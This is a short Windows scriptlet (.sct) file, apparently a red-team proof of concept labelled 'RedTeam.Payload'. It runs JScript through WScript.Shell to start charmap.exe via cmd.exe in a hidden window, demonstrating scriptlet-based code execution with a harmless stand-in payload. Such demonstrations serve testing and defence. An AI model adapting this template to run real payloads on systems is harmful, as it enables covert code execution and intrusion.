<?XML version="1.0"?>
<scriptlet>
<registration
    progid="RedTeam.Payload"
    classid="{00000000-0000-0000-0000-000000000001}"
    description="Execute charmap"
>
</registration>
<script language="JScript">
<![CDATA[
var sh = new ActiveXObject("WScript.Shell");
sh.Run("cmd.exe /c start charmap.exe", 0, false);
]]>
</script>
</scriptlet>